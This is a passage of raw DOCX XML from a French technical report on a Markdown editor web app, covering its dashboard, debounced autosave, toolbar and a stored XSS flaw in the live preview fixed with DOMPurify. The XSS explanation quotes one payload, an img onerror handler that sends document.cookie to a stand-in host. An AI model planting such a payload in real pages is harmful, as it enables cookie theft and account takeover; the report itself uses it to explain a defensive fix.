        <w:t>Capture C-05 — tableau de bord.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'écran ouvre sur trois compteurs — documents créés, brouillons, documents finalisés — puis propose trois portes d'entrée vers la rédaction : partir d'une page blanche, partir d'un modèle, ou reprendre un document existant. Vient ensuite une recherche et la liste, avec un état vide explicite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le choix de trois points d'entrée plutôt qu'un seul bouton répond à un constat d'usage : devant un éditeur vide, l'utilisateur qui n'a pas d'idée précise de structure abandonne. Proposer un modèle ou un document existant comme alternative supprime la page blanche.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les compteurs proviennent de l'API, la recherche filtre la page courante côté client :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4092758" cy="1089266"/>
            <wp:docPr id="38" name="Picture 38"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="23eefc080f02-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4092758" cy="1089266"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aucune vue n'appelle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">axios</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">directement : l'instance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">api</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">porte l'intercepteur qui rafraîchit l'access token après un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">401</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et rejoue la requête. Cette règle est ce qui évite de dupliquer la logique de session dans chaque écran.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="91"/>
    <w:bookmarkStart w:id="93" w:name="X445927a8142c8f93a771bd53eebd3aaaa159dc1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>L'éditeur de document (capture C-07)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4320000" cy="3322273"/>
            <wp:docPr id="9" name="Picture 9"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="C-07-nouveau-document.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4320000" cy="3322273"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Capture C-07 — éditeur de document, création.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C'est l'écran central du produit. Il rassemble les métadonnées du document sur une ligne — titre, statut, dossier —, l'indicateur d'enregistrement, la barre d'outils Markdown, la zone de saisie doublée d'un aperçu en direct, et les actions de validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">L'enregistrement automatique.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>L'exigence du cahier des charges (§ 2 c) est satisfaite par un enregistrement différé : la sauvegarde n'est pas déclenchée à chaque frappe, mais 2,5 secondes après la dernière.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3320787" cy="2491592"/>
            <wp:docPr id="39" name="Picture 39"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="670f40008252-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3320787" cy="2491592"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quatre décisions se lisent dans ces quelques lignes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">délai de 2,5 secondes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">n'est pas arbitraire. Enregistrer à chaque caractère saturerait l'API et multiplierait les écritures sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; un délai trop long rendrait la sauvegarde invisible et ferait perdre du travail à la fermeture de l'onglet. Le principe du</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">debounce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— annuler le minuteur précédent à chaque frappe — fait qu'une phrase tapée d'un trait ne déclenche qu'un seul enregistrement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">garde sur le titre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">empêche de créer des enregistrements sans identité. Un document créé automatiquement dès la première frappe dans le corps du texte, sans titre, apparaîtrait dans la liste sous une forme inexploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">garde sur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">isSaving</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">évite deux requêtes concurrentes sur la même ressource, situation dans laquelle la dernière réponse reçue n'est pas nécessairement la dernière envoyée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">état d'erreur est visible</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Un enregistrement automatique qui échoue en silence est pire que pas d'enregistrement automatique du tout : l'utilisateur croit son travail sauvegardé. Le message « Échec de l'enregistrement auto — pensez à enregistrer manuellement » renvoie explicitement vers le recours disponible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le minuteur est libéré au démontage du composant, et l'enregistrement manuel annule l'enregistrement différé en attente pour éviter un doublon :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2934802" cy="487801"/>
            <wp:docPr id="40" name="Picture 40"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="49239bf591de-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2934802" cy="487801"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Note de lecture — la capture C-07 montre un document vierge : l'indicateur d'enregistrement n'y apparaît pas, puisque le titre est vide et qu'aucune frappe n'a eu lieu. Son emplacement est réservé dans la mise en page (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">h-4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t>) afin que son apparition ne décale pas le contenu. Le comportement est vérifié par le cas fonctionnel TF-06 (§ 9).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">La barre d'outils et l'insertion de syntaxe.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Chaque bouton applique un préfixe et un suffixe Markdown autour de la sélection courante. La fonction est unique et paramétrée, plutôt qu'un gestionnaire par bouton :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3079554" cy="3692261"/>
            <wp:docPr id="41" name="Picture 41"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="45c84bdad847-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3079554" cy="3692261"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Treize boutons pour une seule fonction : ajouter un style de balisage revient à ajouter une ligne dans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">toolbarActions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, sans toucher à la logique d'insertion. L'événement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">input</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">émis en fin de fonction est ce qui relance le minuteur d'enregistrement : une mise en forme appliquée par la barre d'outils est une modification comme une autre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">L'accessibilité de la barre d'outils.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Un ensemble de boutons groupés n'est pas restitué comme tel par un lecteur d'écran sans indication explicite. Le conteneur porte donc un rôle et un libellé, et chaque bouton un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">title</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4237510" cy="889156"/>
            <wp:docPr id="42" name="Picture 42"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="380d59bf676c-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4237510" cy="889156"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">L'aperçu en direct, et la faille qu'il ouvrait.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Le Markdown est converti à la volée par</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">marked</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, puis injecté dans l'aperçu par</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">v-html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Dans sa première version, le code se contentait de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">marked.parse()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— ce qui constituait une</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">vulnérabilité XSS stockée</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">marked</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">convertit le Markdown en HTML mais ne filtre pas le HTML que l'utilisateur a pu saisir directement dans son texte. Un contenu tel que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=x onerror="fetch('https://exfil.example/?c='+document.cookie)"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">était donc exécuté à l'affichage de l'aperçu. Deux facteurs aggravaient la portée de la faille. D'abord l'enregistrement automatique : la charge était sauvegardée en base sans action de l'utilisateur, donc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">persistante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— rechargée et réexécutée à chaque ouverture du document. Ensuite la perspective du partage : tant que chacun ne voit que ses propres documents, l'attaque se limite à soi-même, mais elle deviendrait une prise de contrôle de compte dès le premier document partagé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La correction consiste à assainir la sortie avant injection :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3706773" cy="1088815"/>
            <wp:docPr id="43" name="Picture 43"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fa57e4097384-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3706773" cy="1088815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le profil</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">autorise les balises de mise en forme que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">marked</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">produit légitimement — titres, listes, liens, emphase — et retire tout le reste. Assainir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">la sortie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">plutôt que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">l'entrée</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">est le bon endroit : le Markdown reste stocké tel quel, et un changement de politique d'affichage ne demande pas de réécrire les documents existants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Une réserve, issue de la veille (§ 11) : DOMPurify est elle-même un composant à maintenir, et la version employée doit être tenue à jour. C'est l'argument qui justifie de conserver le stockage en Markdown brut comme</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">seconde ligne de défense</w:t>
      </w:r>
      <w:r>
        <w:t>, indépendante de cette bibliothèque. Les cas TU-19 (§ 9) et TS-01 (§ 9) vérifient l'assainissement à deux niveaux : unitaire sur le calcul de l'aperçu, et fonctionnel sur un document réellement enregistré puis rechargé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112DD5E5" w14:textId="3BAA355A" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="00690DDD" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc198828318"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Des</w:t>
      </w:r>
      <w:r w:rsidR="003A2DEC" w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> extraits de code de composants métier</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidR="003A2DEC" w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La couche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">services/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">porte la logique métier. Deux services sont présentés ici :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auth_service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, le plus sensible, et</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ia_service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, le plus spécifique au produit.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="93"/>
    <w:bookmarkStart w:id="94" w:name="X69b869f8768a7a0d3adfe03b9759ee81dfa9f73"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Politique de mot de passe et hachage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trois points de conception.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
